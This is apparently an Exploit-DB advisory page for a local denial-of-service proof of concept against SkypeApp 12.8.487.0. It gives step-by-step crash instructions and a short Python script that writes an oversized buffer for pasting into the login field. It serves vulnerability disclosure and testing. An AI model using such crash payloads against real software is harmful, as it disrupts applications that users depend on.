SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)

vendor:

SkypeApp

by:

Luis Martinez

7.5

CVSS

HIGH

Denial of Service (DoS) Local

CWE

Product Name: SkypeApp

Affected Version From: 12.8.487.0

Affected Version To: 12.8.487.0

Patch Exists: NO

Related CWE:

CPE: a:skype:skype:12.8.487.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro x64 es

2018

SkypeApp 12.8.487.0 – ‘Cuenta de Skype o Microsoft’ Denial of Service (PoC)

The SkypeApp version 12.8.487.0 is vulnerable to a denial of service attack. By sending a specially crafted payload to the 'Cuenta de Skype o Microsoft' field, an attacker can cause the application to crash.

Mitigation:

No official patch or mitigation is available for this vulnerability at the time of discovery. Users are advised to avoid opening maliciously crafted SkypeApp links or files.

Source

Exploit-DB raw data:

# Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-23
# Vendor Homepage: https://www.skype.com/es/home/
# Tested Version: 12.8.487.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python SkypeApp_12.8.487.0.py
# 2.- Open SkypeApp_12.8.487.0.txt and copy content to clipboard
# 3.- Open SkypeApp.exe
# 4.- Paste ClipBoard on "Cuenta de Skype o Microsoft"
# 5.- Siguiente
# 6.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 65225
f = open ("SkypeApp_12.8.487.0.txt", "w")
f.write(buffer)
f.close()